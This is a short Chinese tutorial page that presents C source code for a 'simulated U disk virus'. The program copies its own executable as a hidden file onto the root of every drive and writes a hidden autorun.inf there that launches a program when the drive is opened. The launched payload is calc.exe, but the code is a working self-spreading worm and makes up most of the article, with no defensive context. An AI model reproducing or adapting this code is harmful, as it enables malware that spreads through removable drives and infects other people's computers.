Home>Article>Backend Development> The simplest simulated U disk virus (Autorun.inf)
autorun.inf是我们电脑使用中比较常见的系统文件 ,其作用是允许在双击磁盘时自动运行指定的某个文件。
1.DWORD GetLogicalDriveStrings(DWORD nBufferLength, // size of bufferLPTSTR lpBuffer // drive strings buffer);
2.char *strncpy(char *dest,char *src,size_t n);第1个参数:char *strDest目的字符串指针。 第2个参数:const char *strSource源字符串指针。 第3个参数:size_t count 拷贝长度。 返回值:目的字符串指针。
#define _CRT_SECURE_NO_WARNINGS #includechar *gstrAutoRun = "[autorun]\ \r\nopen=calc.exe \ \r\nshell\\open\\Command=calc.exe \ \r\nshell\\explore=资源管理器(&X) \ \r\nshell\\explore\\Command=calc.exe \ \r\nshellexecute=calc.exe\ \r\nshell\\Auto\\Command=calc.exe"; void Infect(char *pstrFilePath) { char strDriveStrings[MAXBYTE] = { 0 }; DWORD dwDriveStrLen = GetLogicalDriveStringsA(MAXBYTE, strDriveStrings); DWORD dwError = 0; for (size_t i = 0; i < dwDriveStrLen; i += 4) { char strTargetPath[MAX_PATH] = { 0 }, strRoot[4] = { 0 }; strncpy(strRoot, &strDriveStrings[i], 4); strcpy(strTargetPath, strRoot); strcat(strTargetPath, "demo.exe"); if (!CopyFileA(pstrFilePath,strTargetPath,false)) { dwError = GetLastError(); } SetFileAttributesA(strTargetPath, FILE_ATTRIBUTE_HIDDEN); strcpy(strTargetPath, strRoot); strcat(strTargetPath, "autorun.inf"); HANDLE hFile = CreateFileA(strTargetPath, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,nullptr); DWORD dwLen = 0; WriteFile(hFile, gstrAutoRun, strlen(gstrAutoRun), &dwLen, nullptr); CloseHandle(hFile); } } int main() { char strSelfPath[MAX_PATH] = { 0 }; GetModuleFileNameA(nullptr, strSelfPath, MAX_PATH); Infect(strSelfPath); return 0; }
以上就是 最简单的模拟U盘病毒(Autorun.inf)的内容,更多相关内容请关注PHP中文网(m.sbmmt.com)!